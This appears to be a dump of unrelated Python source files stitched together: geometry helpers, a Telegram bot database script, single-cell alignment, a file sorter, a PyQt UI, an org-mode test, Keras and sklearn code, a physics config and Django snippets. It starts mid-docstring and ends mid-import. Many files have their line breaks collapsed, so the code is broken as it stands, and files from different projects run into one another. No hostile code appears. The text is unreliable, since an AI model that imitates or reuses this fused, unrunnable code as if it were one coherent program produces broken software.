parallel, by default uses all available cores Returns -------- Pandas.DataFrame Masked DataFrame containing only those rows that fall within the Polygon """ if njobs < 0: njobs = cpu_count() xy = df[[x, y]].values f = partial(point_in_poly, poly=poly) with Pool(njobs) as pool: mask = list(pool.map(f, xy)) return df.iloc[mask] def polygon_overlap(poly1: Polygon, poly2: Polygon, threshold: float = 0.): """ Compare the area of two polygons and give the fraction overlap. If fraction overlap does not exceed given threshold or the polygon's do not overlap, return 0.0 Parameters ---------- poly1: Polygon poly2: Polygon threshold: float (default = 0.0) Returns ------- float """ if poly1.intersects(poly2): overlap = float(poly1.intersection(poly2).area / poly1.area) if overlap >= threshold: return overlap return 0. 
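# Usage sketch (added for illustration; not part of the original cytopy module):
# demonstrates the fraction-overlap semantics of polygon_overlap above using plain
# shapely rectangles. Runs only when this module is executed directly.
if __name__ == "__main__":
    _a = Polygon([(0, 0), (2, 0), (2, 2), (0, 2)])   # 2x2 square, area 4
    _b = Polygon([(1, 0), (3, 0), (3, 2), (1, 2)])   # shifted square sharing half of _a
    assert abs(polygon_overlap(_a, _b) - 0.5) < 1e-9       # 50% of _a's area intersects _b
    assert polygon_overlap(_a, _b, threshold=0.6) == 0.0   # overlap below threshold reports 0.0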
def create_polygon(x: list, y: list):
    """
    Given a list of x coordinates and a list of y coordinates, generate a shapely Polygon

    Parameters
    ----------
    x: list
    y: list

    Returns
    -------
    Polygon
    """
    return Polygon([(x, y) for x, y in zip(x, y)])


def inside_ellipse(data: np.array,
                   center: tuple,
                   width: int or float,
                   height: int or float,
                   angle: int or float) -> object:
    """
    Return mask of two dimensional matrix specifying if a data point (row) falls
    within an ellipse

    Parameters
    -----------
    data: numpy.ndarray
        two dimensional matrix (x,y)
    center: tuple
        x,y coordinate corresponding to center of ellipse
    width: int or float
        semi-major axis of ellipse
    height: int or float
        semi-minor axis of ellipse
    angle: int or float
        angle of ellipse

    Returns
    --------
    list
        list of booleans, one per row, True if the row falls inside the specified ellipse
    """
    cos_angle = np.cos(np.radians(180. - angle))
    sin_angle = np.sin(np.radians(180. - angle))

    x = data[:, 0]
    y = data[:, 1]

    xc = x - center[0]
    yc = y - center[1]

    xct = xc * cos_angle - yc * sin_angle
    yct = xc * sin_angle + yc * cos_angle

    rad_cc = (xct ** 2 / (width / 2.) ** 2) + (yct ** 2 / (height / 2.) ** 2)

    in_ellipse = []

    for r in rad_cc:
        if r <= 1.:
            # point in ellipse
            in_ellipse.append(True)
        else:
            # point not in ellipse
            in_ellipse.append(False)
    return in_ellipse


def probablistic_ellipse(covariances: np.array,
                         conf: float):
    """
    Given the covariance matrix of a mixture component, calculate an elliptical shape that
    represents a probabilistic confidence interval.

    Parameters
    ----------
    covariances: np.array
        Covariance matrix
    conf: float
        The confidence interval (e.g. 0.95 would give the region of 95% confidence)

    Returns
    -------
    float and float and float
        Width, Height and Angle of ellipse
    """
    eigen_val, eigen_vec = linalg.eigh(covariances)
    chi2 = stats.chi2.ppf(conf, 2)
    eigen_val = 2. * np.sqrt(eigen_val) * np.sqrt(chi2)
    u = eigen_vec[0] / linalg.norm(eigen_vec[0])
    angle = 180. * np.arctan(u[1] / u[0]) / np.pi
    return eigen_val[0], eigen_val[1], (180. + angle)


def create_convex_hull(x_values: np.array,
                       y_values: np.array):
    """
    Given the x and y coordinates of a cloud of data points, generate a convex hull,
    returning the x and y coordinates of its vertices.

    Parameters
    ----------
    x_values: numpy.ndarray
    y_values: numpy.ndarray

    Returns
    -------
    numpy.ndarray, numpy.ndarray
    """
    xy = np.array([[i[0], i[1]] for i in zip(x_values, y_values)])
    try:
        hull = ConvexHull(xy, incremental=True)
        x = [float(i) for i in xy[hull.vertices, 0]]
        y = [float(i) for i in xy[hull.vertices, 1]]
    except QhullError:
        warn("ConvexHull generated QhullError; cannot generate geometry")
        x, y = [], []
    return x, y


def ellipse_to_polygon(centroid: (float, float),
                       width: float,
                       height: float,
                       angle: float,
                       ellipse: Ellipse or None = None):
    """
    Convert an ellipse to a shapely Polygon object.
Parameters ---------- centroid: (float, float) width: float height: float angle: float ellipse: Ellipse (optional) Returns ------- Polygon """ ellipse = ellipse or Ellipse(centroid, width, height, angle) vertices = ellipse.get_verts() return Polygon(vertices) from re import search import uuid import datetime import os import json from urllib.parse import quote_plus, urlparse import time import requests from lxml.html import fromstring from peewee import * import peeweedbevolve from telegram_bot.auth import hotp from telegram_bot.models import User, Link, Map, Message DB_NAME = "walid_test" DB_USER = os.environ.get("DBUSER", None) DB_PASS = os.environ.get("DBPASS", None) DB_HOST = os.environ.get("DBHOST", None) db = PostgresqlDatabase( DB_NAME, # Required by Peewee. user=DB_USER, # Will be passed directly to psycopg2. password=<PASSWORD>, # Ditto. host=DB_HOST, # Ditto. ) db.get_conn() def urlNormalize(url): if not search(r'http', url): return "http://" + url else: return url def fake_user(): user, created = User.get_or_create(telegramId=0, username = "yabir", defaults={"authCode":0, "secret":uuid.uuid4(), "pocket_configured":False}) return user def start(): print("Starting creation of tables in " + str(DB_NAME)) db.evolve([User, Link, Map, Message]) print("Tables created") def me(u="yabir"): user = fake_user() time = int(datetime.datetime.now().timestamp()) q = User.update(authCode=time).where(User.username==u) num_of_row = q.execute() code = hotp.at(time) print ("Access to " + "http://walid.yabirgb.com" +"/secret/" + str(user.secret) + "/" + str(code)) def store_url(url): user = fake_user() r = requests.get(urlNormalize(url)) tree = fromstring(r.content) title = str(tree.findtext('.//title')) final_url = r.url Link.create(url=final_url, title=title, user = user, date =datetime.datetime.now(), private = True) print("Link saved!") if __name__ == '__main__': import sys if sys.argv[1] == "fake": fake_user() elif sys.argv[1] == "me": me() elif sys.argv[1] == "start": start() elif sys.argv[1] == "save": store_url(sys.argv[2]) <reponame>biobenkj/scanorama<filename>bin/dendritic.py import numpy as np from process import load_names, merge_datasets from scanorama import process_data, find_alignments_table from time_align import time_align_correlate, time_align_visualize NAMESPACE = 'dendritic' data_names = [ 'data/dendritic/unstimulated', 'data/dendritic/unstimulated_repl', 'data/dendritic/lps_1h', 'data/dendritic/lps_2h', 'data/dendritic/lps_4h', 'data/dendritic/lps_4h_repl', 'data/dendritic/lps_6h', ] if __name__ == '__main__': datasets, genes_list, n_cells = load_names(data_names) datasets, genes = merge_datasets(datasets, genes_list) datasets_dimred, genes = process_data(datasets, genes) _, A, _ = find_alignments_table(datasets_dimred) time = np.array([ 0, 0, 1, 2, 4, 4, 6 ]).reshape(-1, 1) time_align_correlate(A, time) x = np.array([ 0, 0, 1, 2, 3, 3, 4 ]).reshape(-1, 1) y = [ -.1, .1, 0, 0, -.1, .1, 0 ] time_align_visualize(A, x, y, namespace=NAMESPACE) import os import shutil import sys print("Welcome to file sort\nEnter 0 in any prompt to exit\nBasic ideas of files and file extensions are necessary for operation of the program") status='not ok' while(status=='not ok'): directory=str(input("Enter the location to be sorted:"))+os.sep if directory ==("0"+os.sep): sys.exit("Termination!!!") filename=os.listdir(directory) status='ok' if not filename: status='not ok' print("The folder doesn't exist!!Check the input and try again...\n0 for termination") f= [] for (dirpath, dirnames, filenames) in 
os.walk(directory): f.extend(filenames) break for i in range(len(filenames)): name,exten=os.path.splitext(filenames[i]) if(os.path.exists(directory+exten[1:])): shutil.move(directory+filenames[i],directory+exten[1:]) else: os.mkdir(directory+exten[1:]) shutil.move(directory+filenames[i],directory+exten[1:]) <filename>examples/sync/connect_and_authorize.py from openstuder import SIGatewayClient, SIProtocolError host = 'localhost' user = 'garfield' password = '<PASSWORD>' client = SIGatewayClient() try: access_level = client.connect(host, user=user, password=password) except SIProtocolError as error: print(f'Unable to connect: {error.reason()}') quit(1) print(f'Connected, access level = {access_level}, gateway runs version {client.gateway_version()}')<filename>qt_view.py # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'qt_view.ui' # # Created by: PyQt5 UI code generator 5.15.2 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(800, 600) MainWindow.setAcceptDrops(True) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.delButton = QtWidgets.QPushButton(self.centralwidget) self.delButton.setGeometry(QtCore.QRect(110, 10, 91, 71)) self.delButton.setMinimumSize(QtCore.QSize(91, 0)) icon = QtGui.QIcon() icon.addPixmap(QtGui.QPixmap("UI/cancel.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.delButton.setIcon(icon) self.delButton.setIconSize(QtCore.QSize(32, 32)) self.delButton.setObjectName("delButton") self.openButton = QtWidgets.QPushButton(self.centralwidget) self.openButton.setGeometry(QtCore.QRect(10, 10, 91, 71)) self.openButton.setMinimumSize(QtCore.QSize(81, 0)) icon1 = QtGui.QIcon() icon1.addPixmap(QtGui.QPixmap("UI/add.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.openButton.setIcon(icon1) self.openButton.setIconSize(QtCore.QSize(32, 32)) self.openButton.setObjectName("openButton") self.downloadImgCheckBox = QtWidgets.QCheckBox(self.centralwidget) self.downloadImgCheckBox.setGeometry(QtCore.QRect(310, 20, 73, 16)) self.downloadImgCheckBox.setObjectName("downloadImgCheckBox") self.tableWidget = QtWidgets.QTableWidget(self.centralwidget) self.tableWidget.setGeometry(QtCore.QRect(20, 100, 781, 451)) self.tableWidget.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn) self.tableWidget.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn) self.tableWidget.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows) self.tableWidget.setShowGrid(True) self.tableWidget.setGridStyle(QtCore.Qt.SolidLine) self.tableWidget.setWordWrap(True) self.tableWidget.setCornerButtonEnabled(True) self.tableWidget.setRowCount(0) self.tableWidget.setColumnCount(1) self.tableWidget.setObjectName("tableWidget") item = QtWidgets.QTableWidgetItem() self.tableWidget.setHorizontalHeaderItem(0, item) self.tableWidget.horizontalHeader().setHighlightSections(True) self.tableWidget.horizontalHeader().setSortIndicatorShown(False) self.tableWidget.horizontalHeader().setStretchLastSection(True) self.tableWidget.verticalHeader().setStretchLastSection(False) self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(700, 80, 81, 21)) self.label.setObjectName("label") self.runButton = QtWidgets.QPushButton(self.centralwidget) 
self.runButton.setGeometry(QtCore.QRect(210, 10, 91, 71)) self.runButton.setMinimumSize(QtCore.QSize(91, 0)) icon2 = QtGui.QIcon() icon2.addPixmap(QtGui.QPixmap("UI/play.svg"), QtGui.QIcon.Normal, QtGui.QIcon.Off) self.runButton.setIcon(icon2) self.runButton.setIconSize(QtCore.QSize(32, 32)) self.runButton.setObjectName("runButton") self.formatStr = QtWidgets.QLineEdit(self.centralwidget) self.formatStr.setGeometry(QtCore.QRect(360, 40, 341, 21)) self.formatStr.setObjectName("formatStr") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(310, 40, 47, 21)) self.label_2.setObjectName("label_2") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(310, 60, 461, 21)) self.label_3.setObjectName("label_3") self.setDefaultBtn = QtWidgets.QPushButton(self.centralwidget) self.setDefaultBtn.setGeometry(QtCore.QRect(710, 40, 75, 21)) self.setDefaultBtn.setObjectName("setDefaultBtn") MainWindow.setCentralWidget(self.centralwidget) self.menubar = QtWidgets.QMenuBar(MainWindow) self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21)) self.menubar.setObjectName("menubar") self.menu = QtWidgets.QMenu(self.menubar) self.menu.setObjectName("menu") self.menu_2 = QtWidgets.QMenu(self.menubar) self.menu_2.setObjectName("menu_2") self.menu_3 = QtWidgets.QMenu(self.menubar) self.menu_3.setObjectName("menu_3") MainWindow.setMenuBar(self.menubar) self.statusbar = QtWidgets.QStatusBar(MainWindow) self.statusbar.setObjectName("statusbar") MainWindow.setStatusBar(self.statusbar) self.action1 = QtWidgets.QAction(MainWindow) self.action1.setObjectName("action1") self.action3 = QtWidgets.QAction(MainWindow) self.action3.setObjectName("action3") self.action2 = QtWidgets.QAction(MainWindow) self.action2.setObjectName("action2") self.action4 = QtWidgets.QAction(MainWindow) self.action4.setObjectName("action4") self.action5 = QtWidgets.QAction(MainWindow) self.action5.setObjectName("action5") self.menu.addAction(self.action3) self.menu.addAction(self.action4) self.menu_2.addAction(self.action1) self.menu_3.addAction(self.action2) self.menu_3.addAction(self.action5) self.menubar.addAction(self.menu_2.menuAction()) self.menubar.addAction(self.menu_3.menuAction()) self.menubar.addAction(self.menu.menuAction()) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Odvrt")) self.delButton.setText(_translate("MainWindow", "刪除全部")) self.openButton.setText(_translate("MainWindow", "開啟")) self.downloadImgCheckBox.setText(_translate("MainWindow", "下載縮圖")) self.tableWidget.setSortingEnabled(False) item = self.tableWidget.horizontalHeaderItem(0) item.setText(_translate("MainWindow", "檔案路徑")) self.label.setText(_translate("MainWindow", "共0個檔案")) self.runButton.setText(_translate("MainWindow", "執行")) self.formatStr.setText(_translate("MainWindow", "%code %title %actor")) self.label_2.setText(_translate("MainWindow", "檔名格式")) self.label_3.setText(_translate("MainWindow", "番號 code | 片名 title | 演員 actor | 發售日 release_date | 片長 volume | 評分 rating | 分類 genres")) self.setDefaultBtn.setText(_translate("MainWindow", "使用預設值")) self.menu.setTitle(_translate("MainWindow", "關於")) self.menu_2.setTitle(_translate("MainWindow", "檔案")) self.menu_3.setTitle(_translate("MainWindow", "選項")) self.action1.setText(_translate("MainWindow", "開啟")) self.action3.setText(_translate("MainWindow", "作者")) 
self.action3.setToolTip(_translate("MainWindow", "作者")) self.action2.setText(_translate("MainWindow", "執行")) self.action4.setText(_translate("MainWindow", "關於此程式")) self.action5.setText(_translate("MainWindow", "刪除全部")) <filename>giggle/__init__.py # from .giggle import Giggle __version__ = "0.1.1" <reponame>blaa/orgassist<gh_stars>10-100 import random import io import datetime as dt import pytz import unittest import jinja2 from orgassist.calendar import DateType from . import orgnode from . import helpers # Example Org file for testing # pre-generated to have a todays dates. ORG_TMPL = """ * PROJECT Aggregator ** TODO This is open task :OPEN_TASK: SCHEDULED: <{{ today }}> ** TODO Past task :TAG1: SCHEDULED: <{{ yesterday }}> ** DONE Already done :DEADLINE: DEADLINE: <{{ today }}> ** [#B] Appointment :APP: <{{ accurate }}> ** Whole day event :WHOLE_DAY: <{{ today }}> ** Inactive date :INACTIVE: [{{ accurate }}] ** [#A] Ranged :RANGE: <{{ yesterday }}>--<{{ today }}> """ DAYTIME = '%Y-%m-%d %a %H:%M' DAY = '%Y-%m-%d %a' # For testing org helpers ORG_CONFIG = { 'files': [], 'files_re': None, 'base': None, 'todos_open': ['TODO'], 'todos_closed': ['DONE', 'CANCELLED'], # How grouping entry is marked - which groups TODOs and DONEs. 'project': 'PROJECT', 'resilient': False, 'timezone': pytz.timezone('UTC'), } class TestOrg(unittest.TestCase): "Test org mode reading" def setUp(self): self.utc = pytz.timezone('UTC') today = dt.datetime.now().replace(hour=random.randint(6, 10), minute=random.randint(0, 59)) today = self.utc.localize(today) yesterday = today - dt.timedelta(days=1) tomorrow = today + dt.timedelta(days=1) accurate = today + dt.timedelta(hours=3) context = { 'today': today.strftime(DAY), 'yesterday': yesterday.strftime(DAY), 'tomorrow': tomorrow.strftime(DAY), 'accurate': accurate.strftime(DAYTIME), } tmpl = jinja2.Template(ORG_TMPL) self.rendered_org = tmpl.render(context) self.org_file = io.StringIO(self.rendered_org) self.db = orgnode.makelist(self.org_file, todo_default=['TODO', 'DONE', 'PROJECT']) def test_orgnode(self): "Test reading ORG using orgnode" self.assertIn('OPEN_TASK', self.db[1].tags) self.assertEqual(self.db[1].headline, 'This is open task') def test_conversion(self): "Test orgnode to events conversion" events = [ helpers.orgnode_to_event(node, ORG_CONFIG) for node in self.db ] # If something fails intermittently - show debug data print(self.rendered_org) # Validate assumptions for event in events: print(event) if 'RANGE' in event.tags: self.assertEqual(event.priority, 'A') self.assertIn(DateType.RANGE, event.date_types) self.assertEqual(event.relevant_date.date_type, DateType.RANGE) if 'OPEN_TASK' in event.tags: self.assertEqual(event.priority, None) self.assertEqual(event.state.name, 'TODO') self.assertTrue(event.state.is_open) self.assertIn(DateType.SCHEDULED, event.date_types) self.assertEqual(event.relevant_date.date_type, DateType.SCHEDULED) if 'DEADLINE' in event.tags: relevant = event.relevant_date self.assertEqual(event.state.name, 'DONE') self.assertFalse(event.state.is_open) self.assertEqual(relevant.date_type, DateType.DEADLINE) self.assertFalse(relevant.appointment) if 'APP' in event.tags: relevant = event.relevant_date self.assertEqual(event.priority, 'B') self.assertTrue(relevant.appointment) self.assertEqual(len(events), 8) import numpy as np from sklearn.model_selection import train_test_split, cross_val_score from sklearn.metrics import accuracy_score from operator import itemgetter class AccuracyValidation(): def __init__(self): self.letters = [ 
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z' ] def split_validation(self, model, image_data, target_data, wrong_predictions = False): """ uses the train_test_split method of sklearn cross validation Divides the training data into 75% : 25%. 75% for training 25% for testing The method prints the percentage of correct predictions Parameters: ----------- model: the machine learning model object image_data: 2D Numpy array of the training data with its features target_data: 1D numpy array of the labels wrong_predictions: Boolean (default is False), if true all the wrong predictions will be displayed for further investigation """ img_train, img_test, target_train, target_test = train_test_split(image_data, target_data) model.fit(img_train, target_train) prediction = model.predict(img_test) accuracy = (float(np.sum(prediction == target_test)) / len(target_test)) print str(round(accuracy * 100, 2))+ "% accuracy was recorded" if wrong_predictions: self.print_wrong_predictions(prediction, target_test, img_test, model) def print_wrong_predictions(self, predictions, correct_labels, img_test, model): """ prints all the wrong predictions made by the model """ print 'Here are the wrong predictions' print 'Prediction\tCorrect Label' print '------------------------------' for i in range(len(predictions)): if predictions[i] != correct_labels[i]: probabilities = model.predict_proba(img_test[i].reshape(1, -1)) print 'Predicted: '+predictions[i]+'\t\t Actual:'+correct_labels[i] print 'Probability Distribution' self.top_predictions(probabilities) print '------------------------' print '------------------------------' def cross_validation(self, model, num_of_fold, train_data, train_label): accuracy_result = cross_val_score(model, train_data, train_label, cv = num_of_fold) print "Cross Validation Result for "+str(num_of_fold)+"-fold" print accuracy_result * 100 def top_predictions(self, probabilities_prediction): predictions = probabilities_prediction.reshape(-1).tolist() predictions_label = [] for index in range(len(predictions)): predictions_label.append((self.letters[index], predictions[index])) predictions_label = sorted(predictions_label, key=itemgetter(1), reverse=True) print predictions_label[:5]<filename>telemetry/visualization/fusion_visualization_recorder.py import os from typing import List import numpy as np from open3d.visualization import Visualizer import open3d as o3d import cv2 from multiprocessing import cpu_count class FusionVisualizationRecorder(): def __init__(self, output_video_path, front=[0, 0, -1], lookat=[0, 0, 1.5], up=[0, -1.0, 0], zoom=0.7): self.visualizer = Visualizer() self.writer = None self.front = front self.lookat = lookat self.up = up self.zoom = zoom self.output_video_path = output_video_path # cv2.VideoWriter_fourcc('X', '2', '6', '4') fourcc = cv2.VideoWriter_fourcc(*"mp4v") # fourcc = cv2.VideoWriter_fourcc(*"x264") self.writer = cv2.VideoWriter(self.output_video_path, fourcc, 30, (1920, 1080), True) self.writer.set(cv2.VIDEOWRITER_PROP_NSTRIPES, cpu_count()) self.visualizer.create_window("Fusion output frame capture") def __del__(self): self.visualizer.destroy_window() if self.writer is not None: self.writer.release() def capture_frame(self, geometry: List[o3d.geometry.Geometry3D]) -> None: for item in geometry: self.visualizer.add_geometry(item) self.visualizer.update_geometry(item) view_controller: o3d.visualization.ViewControl = 
self.visualizer.get_view_control() view_controller.set_front(self.front) view_controller.set_lookat(self.lookat) view_controller.set_up(self.up) view_controller.set_zoom(self.zoom) self.visualizer.poll_events() self.visualizer.update_renderer() frame_image = (np.array(self.visualizer.capture_screen_float_buffer()) * 255).astype(np.uint8) self.writer.write(frame_image) self.visualizer.clear_geometries() <reponame>NTrevisani/cmssw import FWCore.ParameterSet.Config as cms process = cms.Process("TEST") process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring( "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/FAF8A711-C297-DE11-A00E-001731AF66AF.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/FAB8A245-D996-DE11-A866-003048678A6A.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F8D6CB8E-CD96-DE11-A8D2-003048678FFA.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F8349AAD-C297-DE11-99E3-0030486792BA.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F8251242-DA96-DE11-B26B-003048678FC6.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F49C816C-D796-DE11-AC34-003048D15DDA.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F288C73C-C297-DE11-9F00-001731AF684D.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/F0BBFDE1-D496-DE11-8E1B-003048678FE6.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/EE1592A7-C297-DE11-8679-0030486792AC.root", "/store/data/CRAFT09/Cosmics/RAW-RECO/GR09_31X_V5P_CSCSkim_BFieldStudies-332_v4/0021/E2938851-CF96-DE11-8330-0017312B5651.root", )) process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(100)) process.StandAloneTest = cms.EDAnalyzer("StandAloneTest", Tracks = cms.InputTag("")) process.load("Configuration.StandardSequences.MagneticField_cff") process.load("Geometry.CMSCommonData.cmsIdealGeometryXML_cfi") process.load("Geometry.CommonDetUnit.bareGlobalTrackingGeometry_cfi") process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi") process.load("Geometry.DTGeometry.dtGeometry_cfi") process.load("Geometry.CSCGeometry.cscGeometry_cfi") process.load("Geometry.RPCGeometry.rpcGeometry_cfi") process.load("Geometry.TrackerNumberingBuilder.trackerNumberingGeometry_cfi") process.load("Geometry.TrackerGeometryBuilder.trackerGeometry_cfi") ### for cosmic rays (only use one) process.load("TrackingTools.TrackRefitter.globalCosmicMuonTrajectories_cff") process.TrackRefitter = process.globalCosmicMuons.clone() process.TrackRefitter.Tracks = cms.InputTag("globalCosmicMuons") process.StandAloneTest.Tracks = cms.InputTag("globalCosmicMuons") ### for collisions (only use one) # process.load("TrackingTools.TrackRefitter.globalMuonTrajectories_cff") # process.TrackRefitter = process.globalCosmicMuons.clone() # process.TrackRefitter.Tracks = cms.InputTag("globalMuons") # process.StandAloneTest.Tracks = cms.InputTag("globalMuons") process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff") process.GlobalTag.globaltag = cms.string("CRAFT0831X_V1::All") process.load("CondCore.DBCommon.CondDBSetup_cfi") ### for assigning a custom muon alignment # process.MuonAlignment = cms.ESSource("PoolDBESSource", # process.CondDBSetup, # connect = 
cms.string("sqlite_file:customMuonAlignment.db"), # toGet = cms.VPSet(cms.PSet(record = cms.string("DTAlignmentRcd"), tag = cms.string("DTAlignmentRcd")), # cms.PSet(record = cms.string("CSCAlignmentRcd"), tag = cms.string("CSCAlignmentRcd")))) # process.es_prefer_MuonAlignment = cms.ESPrefer("PoolDBESSource", "MuonAlignment") ### it is important to refit with zero weights ("infinite" APEs) process.MuonAlignmentErrorsExtended = cms.ESSource("PoolDBESSource", process.CondDBSetup, connect = cms.string("sqlite_file:APE1000cm.db"), toGet = cms.VPSet(cms.PSet(record = cms.string("DTAlignmentErrorExtendedRcd"), tag = cms.string("DTAlignmentErrorExtendedRcd")), cms.PSet(record = cms.string("CSCAlignmentErrorExtendedRcd"), tag = cms.string("CSCAlignmentErrorExtendedRcd")))) process.es_prefer_MuonAlignmentErrorsExtended = cms.ESPrefer("PoolDBESSource", "MuonAlignmentErrorsExtended") process.TFileService = cms.Service("TFileService", fileName = cms.string("standAloneTest.root")) process.Path = cms.Path(process.TrackRefitter * process.StandAloneTest) import json, os from keras.models import Sequential, Model from keras.layers import Dense, GRU, Input, Dropout, Bidirectional import keras.backend as K from keras import optimizers with open(os.path.join(os.path.dirname(__file__), '../config.json')) as f: CONF = json.load(f) INPUT_SIZE = CONF["train"]["input_size"] FRAME_SIZE = CONF["train"]["frame_size"] def set_frame_size(size): global FRAME_SIZE FRAME_SIZE = size def set_input_size(size): global INPUT_SIZE INPUT_SIZE = size def binary_accuracy(y_true, y_pred): return K.mean(K.equal(K.round(y_true), K.round(y_pred)), axis=-1) def get_bidirectional_model(): model = Sequential() _input = Input(shape=(FRAME_SIZE, INPUT_SIZE)) gru_1 = Bidirectional(GRU(60, kernel_initializer='random_uniform', return_sequences=True))(_input) dropout_gru_1 = Dropout(0.2)(gru_1) gru_2 = Bidirectional(GRU(60, kernel_initializer='random_uniform', return_sequences=True))(dropout_gru_1) dropout_gru_2 = Dropout(0.2)(gru_2) gru_3 = GRU(120, kernel_initializer='random_uniform', return_sequences=False)(dropout_gru_2) dense_1 = Dense(INPUT_SIZE, kernel_initializer='random_uniform', activation='hard_sigmoid')(gru_3) adam = optimizers.Adam(lr=0.001) model = Model(inputs=_input, outputs=dense_1) model.compile(loss='mean_squared_error', optimizer=adam, metrics=[binary_accuracy, 'mae']) return model <reponame>PvrpleBlvck/Python_Learning_Journey import requests import pandas as pd headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'} def get_screener(version): screen = requests.get(f'https://finviz.com/screener.ashx?v={version}&f=ind_consumerelectronics,sec_technology', headers = headers).text tables = pd.read_html(screen) tables = tables[-2] tables.columns = tables.iloc[0] tables = tables[1:] return tables tables111 = get_screener('111') tables161 = get_screener('161') tables121 = get_screener('121') consolidatedtables = pd.merge(tables111,tables161,how='outer',left_on='Ticker',right_on='Ticker') consolidatedtables = pd.merge(consolidatedtables,tables121,how='outer',left_on='Ticker',right_on='Ticker') consolidatedtables.to_csv('test.csv') print(consolidatedtables)# Generated by Django 3.0 on 2020-05-16 07:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("grades", "0019_auto_20200516_0642"), ] operations = [ migrations.AlterField( model_name="course", name="taught_from", 
field=models.IntegerField(default=0), ), ] ''' file goodwin_main.py @author <NAME>, <NAME> @copyright Copyright © UCLouvain 2020 multiflap is a Python tool for finding periodic orbits and assess their stability via the Floquet multipliers. Copyright <2020> <Université catholique de Louvain (UCLouvain), Belgique> List of the contributors to the development of multiflap, Description and complete License: see LICENSE and NOTICE files. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import numpy as np from odes.goodwin_model import GoodwinModel from ms_package.rk_integrator import rk4 from ms_package.multiple_shooting_period import MultipleShootingPeriod from matplotlib.ticker import FormatStrFormatter from scipy.integrate import odeint import matplotlib.pyplot as plt from ms_package.lma_solver_period import SolverPeriod import matplotlib as mpl x = [0.1, 1, 1] time_array = np.linspace(0, 250, 90000) mymodel = GoodwinModel() ms_obj = MultipleShootingPeriod(x, M=40, period_guess= 23., t_steps=200, model=mymodel, integrator='odeint', option_jacobian='numerical') mysol = SolverPeriod(ms_obj = ms_obj).lma() jac = mysol[4] eigenvalues, eigenvectors = np.linalg.eig(jac) sol_array = mysol[3].space sol_time = mysol[3].time period = sol_time[-1] ssp_pert = odeint(GoodwinModel(perturbation=True).dynamics, sol_array[-1,:], time_array) ssp_unpert = odeint(GoodwinModel(perturbation=False).dynamics, sol_array[-1,:], time_array) pert = GoodwinModel().square(time_array, amp=0.05, t_0 = 150) fig1 = plt.figure(figsize=(12,8)) ax1 = fig1.add_subplot(312) ax1.plot(time_array, ssp_pert[:,0], label='x') ax1.plot(time_array, ssp_pert[:,1], label='y') ax1.plot(time_array, ssp_pert[:,2], label='z') ax1.legend() ax1.set_ylabel('Goodwin variables') ax2 = fig1.add_subplot(311) ax2.plot(time_array, pert) ax2.set_ylabel('Rect perturbation') ax3 = fig1.add_subplot(313) ax3.plot(time_array, ssp_pert[:,0] - ssp_unpert[:,0], label='x_pert - x_unpert') ax3.plot(time_array, ssp_pert[:,1] - ssp_unpert[:,1], label='y_pert - y_unpert') ax3.plot(time_array, ssp_pert[:,2] - ssp_unpert[:,2], label='z_pert - z_unpert') ax3.legend() ax3.set_xlabel('time (h)'); ax3.set_ylabel('pert-unpert') plt.show()<reponame>julianwagle/octopod-spork-react from django.apps import AppConfig from django.utils.translation import gettext_lazy as _ class ProfilesConfig(AppConfig): name = "backend.profiles" verbose_name = _("Profiles") from django.db import models from datetime import date from pgweb.core.models import 